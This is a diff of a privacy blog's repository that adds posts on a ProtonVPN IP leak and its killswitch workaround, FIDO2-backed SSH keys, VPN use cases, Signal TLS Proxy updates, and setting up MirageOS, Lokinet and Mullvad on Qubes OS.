- [hostnamectl man page](https://www.freedesktop.org/software/systemd/man/hostnamectl)
|
||||
- [MAC Address Spoofing in NetworkManager 1.4.0](https://blogs.gnome.org/thaller/2016/08/26/mac-address-spoofing-in-networkmanager-1-4-0/)
|
||||
- [NetworkManager.conf man page](https://networkmanager.dev/docs/api/latest/NetworkManager.conf.html)
|
||||
- [NetworkManager-dispatcher man page](https://networkmanager.dev/docs/api/latest/NetworkManager-dispatcher.html)
|
||||
- [NetworkManager: Disable Sending Hostname to DHCP Server](https://viliampucik.blogspot.com/2016/09/networkmanager-disable-sending-hostname.html)
|
||||
- [nmcli man page](https://networkmanager.dev/docs/api/latest/nmcli.html)
|
|
@ -0,0 +1,84 @@
|
|||
---
|
||||
title: "ProtonVPN IP Leakage on Linux and Workaround"
|
||||
date: 2022-10-08
|
||||
tags: ['Applications', 'Linux', 'Qubes OS', 'Privacy']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
**Before We Start**...
|
||||
|
||||
I sent Proton an email regarding this issue in late August 2022 and was told they are working on fixing it, though it will take some time as it requires some architectural changes in how the killswitch works.
|
||||
|
||||
## The Leak
|
||||
|
||||
Ideally, when implementing a killswitch, a VPN client should drop all connections on non-VPN interfaces except when the connection is to the VPN provider's servers. This is necessary to prevent accidental leaks, at least by unprivileged applications. Unfortunately, the ProtonVPN client does not currently do this.
|
||||
|
||||
Effectively, any application that binds to the connected physical interface (as opposed to the VPN's virtual interface) on your Linux system will expose your actual IP address, regardless of the killswitch state. This is problematic, especially for certain applications like Torrent clients, as they tend to use whatever interfaces they can access (rather than just the default one) to connect to the internet.
|
||||
You can check this with `curl`:
|
||||
|
||||
```bash
|
||||
curl --interface <physical interface> https://ipinfo.io
|
||||
```
|
||||
|
||||
This will return your actual IP address.
|
||||
|
||||
## The Workaround
|
||||
|
||||
### Qubes OS
|
||||
|
||||
On Qubes OS, you generally should not have a problem if you use the ProtonVPN client in a ProxyVM. While the same issue still exists within the ProxyVM itself, it is unlikely to manifest as you should not be running any other applications in the same Qube anyways, and apps in an AppVM cannot bind to the public interface of the ProxyVM. I have not observed any leaks from an AppVM behind a ProtonVPN ProxyVM.
|
||||
|
||||
### General Linux Distributions
|
||||
|
||||
On a general Linux distribution, the workaround is to configure OpenVPN manually and setup a killswitch yourself.
|
||||
|
||||
Since ProtonVPN does not support IPv6, you should disable it in your kernel settings:
|
||||
|
||||
```bash
|
||||
echo 'net.ipv6.conf.all.disable_ipv6=1
|
||||
net.ipv6.conf.default.disable_ipv6=1
|
||||
net.ipv6.conf.lo.disable_ipv6=1' | sudo tee /etc/sysctl.d/10-disable-ipv6.conf
|
||||
sudo sysctl -p
|
||||
```
|
||||
|
||||
Next, download your OpenVPN configuration files from [account.protonvpn.com](https://account.protonvpn.com/). In those configuration files, you should see a list of IP addresses and ports of ProtonVPN's servers.
|
||||
|
||||
Finally, set up the VPN killswitch. The rules I posted here are based on [this discussion](https://airvpn.org/forums/topic/15061-firewalld-killswitch/).
|
||||
|
||||
#### Firewalld
|
||||
|
||||
```bash
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter FORWARD 0 -o tun+ -j ACCEPT
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter FORWARD 0 -i tun+ -j ACCEPT
|
||||
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv6 filter INPUT 0 -j DROP
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 0 -i lo -j ACCEPT
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 1 -i tun+ -p tcp -j ACCEPT
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 1 -i tun+ -p udp -j ACCEPT
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 999 -j DROP
|
||||
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv6 filter OUTPUT 0 -j DROP
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 0 -o lo -j ACCEPT
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 0 -o tun+ -j ACCEPT
|
||||
|
||||
#You will need to add each of the IP address and port with the following command:
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 1 -p udp -m udp --dport $PORT -d $IP -j ACCEPT
|
||||
|
||||
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 999 -j DROP
|
||||
|
||||
sudo firewall-cmd --reload
|
||||
```
|
||||
|
||||
#### UFW
|
||||
|
||||
```bash
|
||||
sudo ufw default deny incoming
|
||||
sudo ufw default deny outgoing
|
||||
|
||||
#You will need to add each of the IP address and port with the following command:
|
||||
sudo ufw allow out to $IP port $PORT proto udp
|
||||
|
||||
sudo ufw allow out on tun0 from any to any
|
||||
```
|
||||
|
||||
|
75
content/posts/linux/Securing OpenSSH with FIDO2.md
Normal file
75
content/posts/linux/Securing OpenSSH with FIDO2.md
Normal file
|
@ -0,0 +1,75 @@
|
|||
---
|
||||
title: "Securing OpenSSH with FIDO2"
|
||||
date: 2022-04-09T17:43:12Z
|
||||
tags: ['Operating Systems', 'Linux', 'Security']
|
||||
author: Wonderfall
|
||||
canonicalURL: https://wonderfall.dev/openssh-fido2/
|
||||
ShowCanonicalLink: true
|
||||
---
|
||||
|
||||
Passwordless authentication with OpenSSH keys has been the *de facto* security standard for years. SSH keys are more robust since they're cryptographically sane by default, and are therefore resilient to most bruteforce atacks. They're also easier to manage while enabling a form of decentralized authentication (it's easy and painless to revoke them). So, what's the next step? And more exactly, why would one need something even better?
|
||||
|
||||
|
||||
## Why?
|
||||
|
||||
The main problem with SSH keys is that they're not magic: they consist of a key pair, of which the private key is stored on your disk. You should be wary of various exfiltration attempts, depending on your theat model:
|
||||
|
||||
- If your disk is not encrypted, any physical access could compromise your keys.
|
||||
- If your private key isn't encrypted, malicious applications could compromise it.
|
||||
- Even with both encrypted, malicious applications could register your keystrokes.
|
||||
|
||||
All these attempts are particularly a thing on desktop platforms, because they don't have a proper sandboxing model. On Windows, non-UWP apps could likely have full access to your `.ssh` directory. On desktop Linux distributions, sandboxing is also lacking, and the situation is even worse if you're using X.org since it allows apps to spy on each other (and on your keyboard) by design. A first good step would be to only use SSH from a trusted & decently secure system.
|
||||
|
||||
Another layer of defense would obviously be multi-factor authentication, or the fact that you're relying on a shared secret instead. We can use FIDO2 security keys for that. That way, even if your private key is compromised, the attacker needs physical access to your security key. TOTP is another common 2FA technique, but it's vulnerable to various attacks, and relies on the quality of the implementation on the server.
|
||||
|
||||
|
||||
## How?
|
||||
|
||||
Fortunately for us, [OpenSSH 8.2](https://www.openssh.com/txt/release-8.2) (released in February 2020) introduced native support for FIDO2/U2F. Most OpenSSH distributions should have the middleware set to use the `libfido2` library, including portable versions such as the one [for Win32](https://github.com/PowerShell/Win32-OpenSSH).
|
||||
|
||||
Basically, `ssh-keygen -t ${key_type}-sk` will generate for us a token-backed key pair. The key types that are supported depend on your security key. Newer models should support both ECDSA-P256 (`ecdsa-sk`) and Ed25519 (`ed25519-sk`). If the latter is available, you should prefer it.
|
||||
|
||||
### Client configuration
|
||||
To get started:
|
||||
|
||||
```
|
||||
ssh-keygen -t ed25519-sk
|
||||
```
|
||||
|
||||
This will generate a `id_ed25519_sk` private key and a `id_ed25519_sk.pub` public key in `.ssh`. These are defaults, but you can change them if you want. We will call this key pair a "handle", because they're not sufficient by themselves to derive the real secret (as you guessed it, the FIDO2 token is needed). `ssh-keygen` should ask you to touch the key, and enter the PIN prior to that if you did set one (you probably should).
|
||||
|
||||
You can also generate a **resident key** (referred to as *discoverable credential* in the WebAuthn specification):
|
||||
|
||||
```
|
||||
ssh-keygen -t ed25519-sk -O resident -O application=ssh:user1
|
||||
```
|
||||
|
||||
As you can see, a few options must be specified:
|
||||
|
||||
- `-O resident` will tell `ssh-keygen` to generate a resident key, meaning that the private "handle" key will also be stored on the security key itself. This has security implications, but you may want that to move seamlessly between different computers. In that case, you should absolutely protect your key with a PIN beforehand.
|
||||
- `-O application=ssh:` is necessary to instruct that the resident key will use a particular slot, because the security key will have to index the resident keys (by default, they use `ssh:` with an empty user ID). If this is not specified, the next key generation might overwrite the previous one.
|
||||
- `-O verify-required` is optional but instructs that a PIN is required to generate/access the key.
|
||||
|
||||
Resident keys can be retrieved using `ssh-keygen -K` or `ssh-add -K` if you don't want to write them to the disk.
|
||||
|
||||
### Server configuration
|
||||
Next, transfer your public key over to the server (granted you have already access to it with a regular key pair):
|
||||
|
||||
```
|
||||
ssh-copy-id -i ~/.ssh/id_ed25519_sk.pub user@server.domain.tld
|
||||
```
|
||||
|
||||
*Ta-da!* But one last thing: we need to make sure the server supports this public key format in `sshd_config`:
|
||||
|
||||
```
|
||||
PubkeyAcceptedKeyTypes ssh-ed25519,sk-ssh-ed25519@openssh.com
|
||||
```
|
||||
|
||||
Adding `sk-ssh-ed25519@openssh.com` to `PubkeyAcceptedKeyTypes` should suffice. It's best practice to only use the cryptographic primitives that you need, and hopefully ones that are also modern. This isn't a full-on SSH hardening guide, but you should take a look at the [configuration file GrapheneOS uses](https://github.com/GrapheneOS/infrastructure/blob/main/sshd_config) for their servers to give you an idea on a few good practices.
|
||||
|
||||
Restart the `sshd` service and try to connect to your server using your key handle (by passing `-i ~/.ssh/id_ed25519_sk` to `ssh` for instance). If that works for you (your FIDO2 security key should be needed to derive the real secret), feel free to remove your previous keys from `.ssh/authorized_keys` on your server.
|
||||
|
||||
## That's cool, right?
|
||||
If you don't have a security key, you can buy one from [YubiKey](https://www.yubico.com/fr/store/) (I'm very happy with my 5C NFC by the way), [Nitrokey](https://www.nitrokey.com/), [SoloKeys](https://solokeys.com/) or [OnlyKey](https://onlykey.io/) (to name a few). If you have an Android device with a hardware security module (HSM), such as the Google Pixels equipped with Titan M (Pixel 3+), you could even use them as bluetooth security keys.
|
||||
|
||||
*No reason to miss out on the party if you can afford it!*
|
7
content/posts/linux/_index.md
Normal file
7
content/posts/linux/_index.md
Normal file
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
title: Linux
|
||||
ShowReadingTime: false
|
||||
ShowWordCount: false
|
||||
---
|
||||
|
||||
A collection of posts about Linux and related applications
|
55
content/posts/proxies/Commercial VPN Use Cases.md
Normal file
55
content/posts/proxies/Commercial VPN Use Cases.md
Normal file
|
@ -0,0 +1,55 @@
|
|||
---
|
||||
title: "Commercial VPN Use Cases"
|
||||
date: 2022-07-19
|
||||
tags: ['Knowledge base', 'VPN', 'Privacy']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
Virtual Private Networks are a way of creating a protected and private network over the open Internet. It was originally designed to provide remote access to an internal corporate network. However, in recent years, it has also been used by commercial VPN companies to hide their clients' real IP address from third-party websites and services.
|
||||
|
||||
## Should I use a VPN?
|
||||
|
||||
**Yes**, unless you are already using Tor. A VPN does two things: shifting the risks from your Internet Service Provider to itself and hiding your IP from a third-party service.
|
||||
|
||||
VPNs cannot encrypt data outside of the connection between your device and the VPN server. VPN providers can see and modify your traffic the same way your ISP could. And there is no way to verify a VPN provider's "no logging" policies in any way.
|
||||
|
||||
However, they do hide your actual IP from a third-party service, provided that there are no IP leaks. They help you blend in with others and mitigate IP based tracking.
|
||||
|
||||
## What about encryption?
|
||||
|
||||
Encryption offered by VPN providers are between your devices and their servers. It guarantees that this specific link is secure. This is a step up from using unencrypted proxies where an adversary on the network can intercept the communications between your devices and said proxies and modify them. However, encryption between your apps or browsers with the service providers are not handled by this encryption.
|
||||
|
||||
In order to keep what you actually do on the websites you visit private and secure, you must use [TLS](https://en.wikipedia.org/wiki/Transport_Layer_Security). This will keep your passwords, session tokens, and queries safe from the VPN provider. Consider enabling "HTTPS everywhere" in your browser to mitigate downgrade attacks like [SSL Strip](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf).
|
||||
|
||||
## Should I use encrypted DNS with a VPN?
|
||||
|
||||
Unless your VPN provider hosts the encrypted DNS servers, **no**. Using DOH/DOT (or any other form of encrypted DNS) with third-party servers will simply add more entities to trust and does **absolutely nothing** to improve your privacy/security. Your VPN provider can still see which websites you visit based on the IP addresses and other methods. Instead of just trusting your VPN provider, you are now trusting both the VPN provider and the DNS provider.
|
||||
|
||||
A common reason to recommend encrypted DNS is that it helps against DNS spoofing. However, your browser should already be checking for [TLS certificates](https://en.wikipedia.org/wiki/Transport_Layer_Security#Digital_certificates) with **HTTPS** and warn you about it. If you are not using **HTTPS**, then an adversary can still just modify anything other than your DNS queries and the end result will be little different.
|
||||
|
||||
Needless to say, **you shouldn't use encrypted DNS with Tor**. This would direct all of your DNS requests to a single entity and make you stand out from the rest of Tor users who would be using the exit node's DNS configuration.
|
||||
|
||||
## What if I need anonymity?
|
||||
|
||||
VPNs cannot provide anonymity. Your VPN provider will still see your real IP address, and often has a money trail that can be linked directly back to you. You cannot rely on "no logging" policies to protect your data. Use [Tor](https://www.torproject.org/) instead.
|
||||
|
||||
## Should I use Tor over VPN?
|
||||
|
||||
By using Tor over VPN, you are creating essentially adding an extra node in the beginning of the circuit. This provides zero additional benefits to you, while increasing the latency of your connection dramatically. If you wish to hide your Tor usage from your ISP or your government, Tor has a built-in solution for that: Tor bridges.
|
||||
|
||||
## What about VPN over Tor?
|
||||
|
||||
By using VPN over Tor, you are adding an extra node at the end of a circuit, which is always controlled by the same entity. If you pay for the VPN using the traditional banking system, it essentially breaks the anonymity that the three hops in front of it would provide. If you pay for the VPN subscription using cash or a private cryptocurrency like Monero, your privacy is reduced to that of pseudonymity, since the VPN provider still knows the connections being made are from the same individual, they just do not know who you really are. Even if you are using a free VPN, you would still break [Stream Isolation](https://www.whonix.org/wiki/Stream_Isolation), one of Tor's important anonymity features. There are very few use cases where it would make sense to add a VPN server at the end of the chain.
|
||||
|
||||
## What about VPN providers that provide Tor nodes?
|
||||
|
||||
Do not use that feature. The point of using Tor is that you do not trust your VPN provider. Currently Tor only supports the [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) protocol. Through Tor, [UDP](https://en.wikipedia.org/wiki/User_Datagram_Protocol) (used in [WebRTC](https://en.wikipedia.org/wiki/WebRTC) for voice and video sharing, the new [HTTP3/QUIC](https://en.wikipedia.org/wiki/HTTP/3) protocol, etc), [ICMP](https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol) and other packets will be dropped. To compensate for this, VPN providers typically will route all non-TCP packets through their VPN server (your first hop). This is the case with [ProtonVPN](https://protonvpn.com/support/tor-vpn/). Additionally, like VPN over Tor, you lose control over other important Tor features like Stream Isolation.
|
||||
Thus, this feature should be viewed as a convenient way to access the Tor Network, not to stay anonymous. For true anonymity, use the Tor Browser Bundle, TorSocks, or a Tor gateway.
|
||||
|
||||
## When are VPNs useful?
|
||||
|
||||
A VPN is useful in a variety of scenarios, such as:
|
||||
|
||||
- Hiding your traffic from **only** your Internet Service Provider.
|
||||
- Hiding your downloads (such as torrents) from your ISP and anti-piracy organizations.
|
||||
- Hiding your IP from third-party websites and services, preventing IP based tracking.
|
20
content/posts/proxies/Update your Signal TLS Proxy.md
Normal file
20
content/posts/proxies/Update your Signal TLS Proxy.md
Normal file
|
@ -0,0 +1,20 @@
|
|||
---
|
||||
title: "Update your Signal TLS Proxy"
|
||||
date: 2022-10-15
|
||||
tags: ['Applications', 'Linux', 'Container', 'Censorship Evasion']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||

|
||||
|
||||
Given the current censorship situation in Iran, I decided to have a look at the [Signal TLS Proxy](https://github.com/signalapp/Signal-TLS-Proxy).
|
||||
|
||||
One thing immediately jumped out - the NGINX image has not been updated [for years](https://github.com/signalapp/Signal-TLS-Proxy/blob/ac94d6b869f942ec05d7ef76840287a1d1f487f9/nginx-relay/Dockerfile#L9). In fact, NGINX 1.18 is so old that it has gone end of life for [a year and a half](https://endoflife.date/nginx) as of this writing.
|
||||
|
||||
If you are deploying or maintaining a Signal TLS Proxy, I highly recommend that you use the upstream `nginx:alpine` image instead.
|
||||
|
||||
My Docker Compose setup can be found [here](https://github.com/tommytran732/Signal-TLS-Proxy). I have also fixed the missing `:Z` flag for mountpoints and and dropped privileges to reduce the attack surface. I made a couple of pull requests for these changes, but Signal is being very slow on reviewing and merging them, so... yeah.
|
||||
|
||||
- [Drop capabilities](https://github.com/signalapp/Signal-TLS-Proxy/pull/24)
|
||||
- [Use upstream NGINX image](https://github.com/signalapp/Signal-TLS-Proxy/pull/23)
|
||||
- [Add :Z for SELinux](https://github.com/signalapp/Signal-TLS-Proxy/pull/22)
|
7
content/posts/proxies/_index.md
Normal file
7
content/posts/proxies/_index.md
Normal file
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
title: Proxies
|
||||
ShowReadingTime: false
|
||||
ShowWordCount: false
|
||||
---
|
||||
|
||||
A collection of posts about proxies
|
97
content/posts/qubes/Firewalling with MirageOS on Qubes OS.md
Normal file
97
content/posts/qubes/Firewalling with MirageOS on Qubes OS.md
Normal file
|
@ -0,0 +1,97 @@
|
|||
---
|
||||
title: "Firewalling with MirageOS on Qubes OS"
|
||||
date: 2022-08-26
|
||||
tags: ['Operating Systems', 'MirageOS', 'Qubes OS', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||

|
||||
|
||||
[MirageOS](https://mirage.io/) is a library operating system with which you can create a unikernel for the sole purpose of acting as Qubes OS's firewall. In this post, I will walk you through how to set this up.
|
||||
|
||||
## Advantages
|
||||
- Small attack surface. The unikernel only contains a minimal set of libraries to function, so it has a much smaller attack surface than a general purpose operating system like a Linux distribution or openBSD.
|
||||
- Low resource consumption. You only need about 64MB of RAM for each instance of the Mirage Firewall.
|
||||
- Fast startup time.
|
||||
|
||||
## Disadvantages
|
||||
- No official package for Qubes OS and while [Qubes Mirage Firewall](https://github.com/mirage/qubes-mirage-firewall) is still maintained, it rarely gets an official release. This means that you need to follow the development process on GitHub and make a new build yourself whenever there is a new commit.
|
||||
- Does not work well with the Windows PV network driver. With that being said, the Windows PV networking driver is pretty buggy on its own, and I don't recommend that you use it anyways.
|
||||
|
||||
### Prebuilt Image
|
||||
|
||||
You can obtain a prebuilt image of MirageOS [here](https://github.com/tommytran732/QubesOS-Scripts/tree/main/mirageos). I do follow the development of Qubes Mirage Firewall (since I use it on my personal computer) and will be uploading builds frequently.
|
||||
|
||||
### Building Mirage-Firewall Yourself
|
||||
|
||||
First, you need to make sure that you have Docker installed on your system. Then, run the following commands:
|
||||
|
||||
```bash
|
||||
git clone https://github.com/palainp/qubes-mirage-firewall/
|
||||
cd qubes-mirage-firewall
|
||||
git checkout mirage4
|
||||
sudo ./build-with-docker.sh
|
||||
```
|
||||
Once the build process finishes, the unikernel should be at `~/qubes-mirage-firewall/_build/mirage-firewall/vmlinuz`.
|
||||
|
||||
## Deploy
|
||||
|
||||
First, you need to copy the unikernel to `/var/lib/qubes/vm-kernels/mirage-firewall` in `dom0` and create a dummy `initramfs`:
|
||||
|
||||
```bash
|
||||
mkdir -p /var/lib/qubes/vm-kernels/mirage-firewall/
|
||||
cd /var/lib/qubes/vm-kernels/mirage-firewall/
|
||||
qvm-run -p your_appvm_name 'cat /path/to/the/vmlinuz/file' > vmlinuz
|
||||
gzip -n9 < /dev/null > initramfs
|
||||
```
|
||||
### TemplateVM
|
||||
|
||||
Create a TemplateVM:
|
||||
|
||||
```bash
|
||||
qvm-create \
|
||||
--property kernel=mirage-firewall \
|
||||
--property kernelopts='' \
|
||||
--property memory=128 \
|
||||
--property maxmem=128 \
|
||||
--property vcpus=1 \
|
||||
--property virt_mode=pvh \
|
||||
--label=black \
|
||||
--class TemplateVM \
|
||||
your_template_name
|
||||
```
|
||||
|
||||
Don't worry if the TemplateVM doesn't launch - we don't need it to.
|
||||
|
||||
### Disposable Template
|
||||
|
||||
Next, create a disposable template based on the TemplateVM you have just created.
|
||||
|
||||
```bash
|
||||
qvm-create \
|
||||
--property template=your_template_name \
|
||||
--property provides_network=True \
|
||||
--property template_for_dispvms=True \
|
||||
--label=orange \
|
||||
--class AppVM \
|
||||
your_disposable_template_name
|
||||
|
||||
qvm-features your_disposable_template_name qubes-firewall 1
|
||||
qvm-features your_disposable_template_name no-default-kernelopts 1
|
||||
```
|
||||
|
||||
Your disposable templates should now launch and shutdown properly.
|
||||
|
||||
### Disposable FirewallVMs
|
||||
|
||||
You can now create disposable FirewallVMs based on your disposable template. I recommend replacing `sys-firewall` with a disposable Mirage firewall. If you use ProxyVMs like `sys-whonix`, I recommend that you add a disposable Mirage Firewall after the ProxyVM as well, and use it as the net qube for your AppVMs.
|
||||
|
||||
```bash
|
||||
qvm-create \
|
||||
--property template=your_disposable_template_name \
|
||||
--property provides_network=True \
|
||||
--property netvm=your_net_qube_name \
|
||||
--label=orange \
|
||||
--class DispVM \
|
||||
your_firwall_name
|
||||
```
|
74
content/posts/qubes/Using Lokinet on Qubes OS.md
Normal file
74
content/posts/qubes/Using Lokinet on Qubes OS.md
Normal file
|
@ -0,0 +1,74 @@
|
|||
---
|
||||
title: "Using Lokinet on Qubes OS"
|
||||
date: 2022-07-27
|
||||
tags: ['Applications', 'Qubes OS', 'Anonymity', 'Privacy']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||

|
||||
|
||||
[Lokinet](https://lokinet.org) is an Internet overlay network utilizing onion routing to provide anonymity for its users, similar to Tor network. This post will provide a quick (and non exhaustive) list of its [pros](#advantages) and [cons](#disadvantages) from an end user perspective and go over how to set it up on Qubes OS.
|
||||
|
||||
## Advantages
|
||||
|
||||
- Provides anonymity by removing trust in a service provider (as opposed to a traditional VPN)
|
||||
- Better versatility than Tor by supporting any IP based protocols (Tor only supports TCP)
|
||||
- Generally faster speed than the Tor Network
|
||||
|
||||
## Disadvantages
|
||||
|
||||
- Only works well on Debian-based distributions. The client for Windows has DNS Leaks, and support for macOS, Android, and other Linux distributions is experimental. It should be noted that this is a problem with the official client, not the protocol itself.
|
||||
- Does not have a killswitch which could lead to accidental leaks (as opposed to common commercial VPN clients which lock the connections to just the provider's servers).
|
||||
- The official client requires a user to manually define an exit node, or to set certain IP ranges to be routed through certain exit nodes. While this makes it possible to setup some form of Steam Isolation, it is not as good as Tor's `isolateDestinationAddr` and `isolateDesitnationPort`. which automatically use a random exit node for every destination/port you visit.
|
||||
- DNS does not work when used as a ProxyVM on Qubes OS
|
||||
|
||||
## Creating the TemplateVM
|
||||
|
||||
As mentioned [above](#disadvantages), the Lokinet client only works well with Debian-based distributions. This means that our template will have to be one of the Debian-based ones, and I would highly recommend that you convert the official Debian template by the Qubes OS team into a KickSecure template to use as a base. KickSecure reduces the attack surface of Debian with a substantial set of hardening configurations, and a nice feature to go with an anonymity network like Lokinet is [Boot Clock Randomization](https://www.kicksecure.com/wiki/Boot_Clock_Randomization) which helps defend against [time-based denonymization attacks](https://www.whonix.org/wiki/Time_Attacks). You will only need the `kicksecure-cli` meta package (`kicksecure-gui` is unnecessary), and experimental services like `proc-hidepid`, `hide-hardware-info` and `permission-hardening` work just fine with the Lokinet client. [Hardened Malloc](https://www.kicksecure.com/wiki/Hardened_Malloc) and [LKRG](https://www.kicksecure.com/wiki/Linux_Kernel_Runtime_Guard_LKRG) do not cause any problem with Lokinet, either.
|
||||
|
||||
Since DNS with Lokinet does not work if it is installed inside of a ProxyVM, we will need to have Lokinet running inside the same AppVM as the applications you intend to run. This is less than ideal, as a compromised AppVM could reveal your IP address. Beyond that, accidental leaks can happen, too.
|
||||
|
||||
A potential solution to this problem is to set up an unbound server or firewall script redirecting all DNS traffic to the ProxyVM to its Lokinet DNS server at `127.3.2.1:53`; however, I have been unable to get it working. Another solution is to simply override the DNS server inside the AppVM to a custom DNS server, but this will make you stand out out and break `.loki` DNS resolution. Websites like [DNS leak test](https://dnsleaktest.com) can observe which DNS server you are actually using and potentially fingerprint you. For the same reason that you should not use custom DNS servers when connected to the Tor network, you really should not use a custom DNS server when connected to Lokinet.
|
||||
|
||||
Start by importing the Oxen's PGP key:
|
||||
|
||||
`sudo curl --proxy http://127.0.0.1:8082 -so /etc/apt/trusted.gpg.d/oxen.gpg https://deb.oxen.io/pub.gpg`
|
||||
|
||||
Then, add Oxen's Debian repository:
|
||||
|
||||
`echo "deb https://deb.oxen.io $(lsb_release -sc) main" | sudo tee /etc/apt/sources.list.d/oxen.list`
|
||||
|
||||
Next, update the repositories:
|
||||
|
||||
`sudo apt update`
|
||||
|
||||
If updates for your packages are found, **DO NOT** attempt to upgrade them directly. Instead, use the Qubes Updater to update the TemplateVM.
|
||||
|
||||
When you are done, install `lokinet-gui` and `resolvconf`:
|
||||
|
||||
`sudo apt install lokinet-gui resolvconf`
|
||||
|
||||
Note that you **must** install `resolveconf` to get DNS working.
|
||||
|
||||
Next, edit `/var/lib/lokinet/lokinet.ini` and add the exit server you want to use:
|
||||
|
||||
`exit-node=exit.loki`
|
||||
|
||||
Note that I am using `exit.loki` here, as it is the one mentioned in the [Lokinet documentation](https://docs.oxen.io/products-built-on-oxen/lokinet/exit-nodes).
|
||||
There are some other exit servers listed on [probably.loki](http://probably.loki/wiki/index.php?title=Exit_Nodes) as well, and for your convenience, I will just copy-paste them here:
|
||||
|
||||
- `exit.loki` (USA, run by Jeff)
|
||||
- `exit2.loki` (USA, run by Jeff, same ip as exit.loki)
|
||||
- `xite.loki` (Iceland, run by Loutchi)
|
||||
- `peter.loki` (USA, run by peter)
|
||||
- `secret.loki` (Netherlands, run by Secret)
|
||||
|
||||
Finally, enable the `lokinet` service:
|
||||
|
||||
`systemctl enable lokinet`
|
||||
|
||||
## Creating the AppVM
|
||||
|
||||
Just create the AppVM as usual, and you would be good to go. There are a few things to keep in mind though:
|
||||
- You should probably set networking to use `sys-firewall`. I have tested using my ProtonVPN ProxyVM for networking, and DNS was not working. Besides, it makes little sense to attempt such setup anyways, unless you are worried about accidental leaks or a compromised AppVM.
|
||||
- You should give the AppVM the `network-manager` service so that Lokinet can set up networking properly and get DNS working.
|
71
content/posts/qubes/Using Mullvad VPN on Qubes OS.md
Normal file
71
content/posts/qubes/Using Mullvad VPN on Qubes OS.md
Normal file
|
@ -0,0 +1,71 @@
|
|||
---
|
||||
title: "Using Mullvad VPN on Qubes OS"
|
||||
date: 2022-09-03
|
||||
tags: ['Applications', 'Qubes OS', 'Privacy']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||

|
||||
|
||||
Mullvad is a fairly popular and generally trustworthy VPN provider. In this post, I will walk you through how to use the official Mullvad client in a ProxyVM on Qubes OS. This method is a lot more convenient than the [official guide](https://mullvad.net/en/help/qubes-os-4-and-mullvad-vpn/) from Mullvad (which recommends that you manually load in OpenVPN or Wireguard profiles) and will let you seamlessly switch between different location and network setups just as you would on a normal Linux installation.
|
||||
|
||||
## Preparing your TemplateVM
|
||||
|
||||
I recommend that you make a new TemplateVM based on latest Fedora template and remove all unnecessary packages that you might not use. This way, you can minimize the attack surface while not having to deal with missing dependencies like on a minimal template. With that being said, if you do manage to get the minimal template to fully work with Mullvad, feel free to [open a discussion on GitHub](https://github.com/orgs/PrivSec-dev/discussions) or [contact me directly](https://tommytran.io/contact) and I will update the post accordingly.
|
||||
|
||||
This is what I run on my template to trim it down:
|
||||
```bash
|
||||
sudo dnf remove firefox thunderbird totem gnome-remote-desktop gnome-calendar gnome-disk-utility gnome-calculator gnome-connections gnome-weather gnome-contacts gnome-clocks gnome-maps gnome-screenshot gnome-logs gnome-characters gnome-font-viewer gnome-color-manager simple-scan keepassxc cheese baobab yelp evince* httpd mozilla* cups rygel -y
|
||||
sudo dnf autoremove -y
|
||||
```
|
||||
|
||||
Next, you need to create the bind directories for Mullvad's configurations:
|
||||
|
||||
```bash
|
||||
sudo mkdir -p /etc/qubes-bind-dirs.d
|
||||
sudo tee /etc/qubes-bind-dirs.d/50_user.conf << EOF > /dev/null
|
||||
binds+=( '/etc/mullvad-vpn' )
|
||||
EOF
|
||||
```
|
||||
|
||||
## Installing the Mullvad App
|
||||
|
||||
Inside of the TemplateVM you have just created, do the following:
|
||||
|
||||
```bash
|
||||
sudo dnf install https://mullvad.net/media/app/MullvadVPN-2022.5_x86_64.rpm
|
||||
sudo systemctl enable mullvad-daemon
|
||||
```
|
||||
|
||||
Replace `https://mullvad.net/media/app/MullvadVPN-2022.5_x86_64.rpm` with whatever the latest URL for the Mullvad App is. I will try to update this post to give you the accurate command, but you should just take them from [their website](https://mullvad.net/en/download/linux/).
|
||||
|
||||

|
||||
|
||||
Shutdown the TemplateVM:
|
||||
|
||||
```bash
|
||||
sudo shutdown now
|
||||
```
|
||||
|
||||
## Creating the ProxyVM
|
||||
|
||||
Create an AppVM based on the TemplateVM you have just created. Set `sys-firewall` (or whatever FirewallVM you have connected to your `sys-net`) as the net qube. If you do not have such FirewallVM, use `sys-net` as the net qube. Next, go to the advanced tab and tick the `provides network access to other qubes` box.
|
||||
|
||||

|
||||
|
||||
Edit `/rw/config/rc.local` to workaround [issue 3803](https://github.com/mullvad/mullvadvpn-app/issues/3803):
|
||||
|
||||
```bash
|
||||
echo "sleep 10 # Waiting a bit that Mullvad succeeds to establish connection
|
||||
/usr/lib/qubes/qubes-setup-dnat-to-ns" | sudo tee -a /rw/config/rc.local
|
||||
```
|
||||
|
||||
You can now use this ProxyVM as the net qube for other qubes!
|
||||
|
||||
## Notes
|
||||
|
||||
With this current setup, the ProxyVM you have just created will be responsible for handling Firewall rules for the qubes behind it. This is not ideal, as this is still a fairly large VM, and there is a risk that Mullvad or some other apps may interfere with its firewall handling.
|
||||
|
||||
